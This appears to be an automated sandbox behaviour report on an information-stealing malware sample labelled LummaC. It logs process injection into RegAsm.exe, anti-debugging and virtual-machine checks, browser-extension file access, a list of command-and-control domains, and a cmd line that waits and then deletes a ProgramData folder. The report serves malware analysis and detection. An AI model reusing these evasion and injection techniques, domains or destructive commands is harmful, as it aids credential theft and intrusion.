Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 508	Thread sleep time: -30000s >= -30000s

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00410DDB GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 00410EEEh

3_2_00410DDB

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041543D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	3_2_0041543D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00414CC8 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,strtok_s,FindNextFileA,FindClose,	3_2_00414CC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00409D1C FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	3_2_00409D1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040D5C6 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	3_2_0040D5C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040B5DF FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	3_2_0040B5DF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00401D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,	3_2_00401D80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040BF4D FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,	3_2_0040BF4D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00415FD1 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	3_2_00415FD1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040B93F FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	3_2_0040B93F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00415B0B GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,	3_2_00415B0B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040CD37 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,FindNextFileA,FindClose,	3_2_0040CD37

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00415142 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,

3_2_00415142

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00410FBA GetSystemInfo,wsprintfA,

3_2_00410FBA

Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\KECBKKEBKE.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\EGDGCGCFHI.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\DBGIJEHIID.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\userGIEGHJEGHJ.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\userIJEGDBGDBF.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior

Source: RegAsm.exe, 00000012.00000002.3051565260.00000000273D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: RegAsm.exe, 0000001B.00000002.2766184934.000000000132B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWf3<
Source: RegAsm.exe, 00000003.00000002.2595193937.00000000014F1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW<
Source: RegAsm.exe, 0000000E.00000002.2863943868.00000000011BA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware]
Source: RegAsm.exe, 00000003.00000002.2595193937.00000000014F1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2595193937.00000000014C0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2584297027.0000000001446000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2584297027.0000000001495000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.2863943868.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.2863943868.000000000121F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.3026337297.000000000103E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.3026337297.0000000000FDA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2766184934.00000000012BB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2766184934.000000000132B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: RegAsm.exe, 0000001B.00000002.2766184934.00000000012BB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: RegAsm.exe, 0000001B.00000002.2766184934.00000000012BB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMwareW
Source: RegAsm.exe, 00000012.00000002.3026337297.0000000000FDA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMwarev

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API call chain: ExitProcess graph end node

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process information queried: ProcessInformation

Jump to behavior

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 10_2_00446BB0 LdrInitializeThunk,

10_2_00446BB0

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_0041D160 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

3_2_0041D160

Contains functionality to dynamically determine API calls

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

3_2_00418A9A

Contains functionality to read the PEB

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004014AD mov eax, dword ptr fs:[00000030h]	3_2_004014AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040148A mov eax, dword ptr fs:[00000030h]	3_2_0040148A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004014A2 mov eax, dword ptr fs:[00000030h]	3_2_004014A2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004186E3 mov eax, dword ptr fs:[00000030h]	3_2_004186E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004186E4 mov eax, dword ptr fs:[00000030h]	3_2_004186E4

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

3_2_0040884C

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041D160 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_0041D160
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041DADC _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_0041DADC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0042777E SetUnhandledExceptionFilter,	3_2_0042777E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C54B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_6C54B66C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C54B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_6C54B1F7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C6FAC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_6C6FAC62

Source: C:\Users\user\Desktop\file.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: Process Memory Space: file.exe PID: 3664, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 3532, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: DBGIJEHIID.exe PID: 6720, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 1916, type: MEMORYSTR

.NET source code references suspicious native API functions

Source: file.exe, Program.cs	Reference to suspicious API methods: GetProcAddress(LoadLibraryA("kernel32.dll"), "VirtualProtectEx")
Source: file.exe, Program.cs	Reference to suspicious API methods: GetProcAddress(LoadLibraryA("kernel32.dll"), "VirtualProtectEx")
Source: file.exe, Program.cs	Reference to suspicious API methods: GetProcAddress(LoadLibraryA("kernel32.dll"), "VirtualProtectEx")

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\file.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\ProgramData\KECBKKEBKE.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\ProgramData\EGDGCGCFHI.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\ProgramData\DBGIJEHIID.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
Source: C:\Users\userGIEGHJEGHJ.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
Source: C:\Users\userIJEGDBGDBF.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\file.exe

0_2_02CE2139

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\ProgramData\KECBKKEBKE.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\ProgramData\EGDGCGCFHI.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\ProgramData\DBGIJEHIID.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\userGIEGHJEGHJ.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\Users\userIJEGDBGDBF.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A

LummaC encrypted strings found

Source: KECBKKEBKE.exe, 00000007.00000002.2542346827.0000000003565000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: delaylacedmn.site
Source: KECBKKEBKE.exe, 00000007.00000002.2542346827.0000000003565000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: writekdmsnu.site
Source: KECBKKEBKE.exe, 00000007.00000002.2542346827.0000000003565000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: agentyanlark.site
Source: KECBKKEBKE.exe, 00000007.00000002.2542346827.0000000003565000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: bellykmrebk.site
Source: KECBKKEBKE.exe, 00000007.00000002.2542346827.0000000003565000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: underlinemdsj.site
Source: KECBKKEBKE.exe, 00000007.00000002.2542346827.0000000003565000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: commandejorsk.site
Source: KECBKKEBKE.exe, 00000007.00000002.2542346827.0000000003565000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: possiwreeste.site
Source: KECBKKEBKE.exe, 00000007.00000002.2542346827.0000000003565000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: famikyjdiag.site

Searches for specific processes (likely to inject)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004124A8 __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,		3_2_004124A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041257F __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,		3_2_0041257F

Writes to foreign memory regions

Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 430000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43D000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 670000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 671000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: F7B008	Jump to behavior
Source: C:\ProgramData\KECBKKEBKE.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\ProgramData\KECBKKEBKE.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\ProgramData\KECBKKEBKE.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 44C000	Jump to behavior
Source: C:\ProgramData\KECBKKEBKE.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 44F000	Jump to behavior
Source: C:\ProgramData\KECBKKEBKE.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 45E000	Jump to behavior
Source: C:\ProgramData\KECBKKEBKE.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 10F2008	Jump to behavior
Source: C:\ProgramData\EGDGCGCFHI.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\ProgramData\EGDGCGCFHI.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\ProgramData\EGDGCGCFHI.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 430000	Jump to behavior
Source: C:\ProgramData\EGDGCGCFHI.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43D000	Jump to behavior
Source: C:\ProgramData\EGDGCGCFHI.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 670000	Jump to behavior
Source: C:\ProgramData\EGDGCGCFHI.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 671000	Jump to behavior
Source: C:\ProgramData\EGDGCGCFHI.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: C28008	Jump to behavior
Source: C:\ProgramData\DBGIJEHIID.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\ProgramData\DBGIJEHIID.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\ProgramData\DBGIJEHIID.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 41E000	Jump to behavior
Source: C:\ProgramData\DBGIJEHIID.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 42B000	Jump to behavior
Source: C:\ProgramData\DBGIJEHIID.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 65C000	Jump to behavior
Source: C:\ProgramData\DBGIJEHIID.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: CA4008	Jump to behavior
Source: C:\Users\userGIEGHJEGHJ.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\userGIEGHJEGHJ.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
Source: C:\Users\userGIEGHJEGHJ.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 430000
Source: C:\Users\userGIEGHJEGHJ.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43D000
Source: C:\Users\userGIEGHJEGHJ.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 670000
Source: C:\Users\userGIEGHJEGHJ.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 671000
Source: C:\Users\userGIEGHJEGHJ.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: E92008
Source: C:\Users\userIJEGDBGDBF.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\userIJEGDBGDBF.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
Source: C:\Users\userIJEGDBGDBF.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 44C000
Source: C:\Users\userIJEGDBGDBF.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 44F000
Source: C:\Users\userIJEGDBGDBF.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 45E000
Source: C:\Users\userIJEGDBGDBF.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 1156008

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\KECBKKEBKE.exe "C:\ProgramData\KECBKKEBKE.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\EGDGCGCFHI.exe "C:\ProgramData\EGDGCGCFHI.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\DBGIJEHIID.exe "C:\ProgramData\DBGIJEHIID.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\FIJKEHJJDAAK" & exit	Jump to behavior
Source: C:\ProgramData\KECBKKEBKE.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\ProgramData\KECBKKEBKE.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\ProgramData\EGDGCGCFHI.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\ProgramData\EGDGCGCFHI.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\ProgramData\DBGIJEHIID.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\ProgramData\DBGIJEHIID.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userGIEGHJEGHJ.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userIJEGDBGDBF.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\userGIEGHJEGHJ.exe "C:\Users\userGIEGHJEGHJ.exe"
Source: C:\Users\userGIEGHJEGHJ.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\userIJEGDBGDBF.exe "C:\Users\userIJEGDBGDBF.exe"
Source: C:\Users\userIJEGDBGDBF.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

Contains functionality to query CPU information (cpuid)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_0040111D cpuid

3_2_0040111D

Contains functionality to query locales information (e.g. system language)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,	3_2_00410DDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	3_2_0042B21C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,	3_2_0042B311
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,	3_2_00429BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,	3_2_0042B3B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,	3_2_0042B413
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,	3_2_0042AC90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,	3_2_00425533
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	3_2_0042B5E4
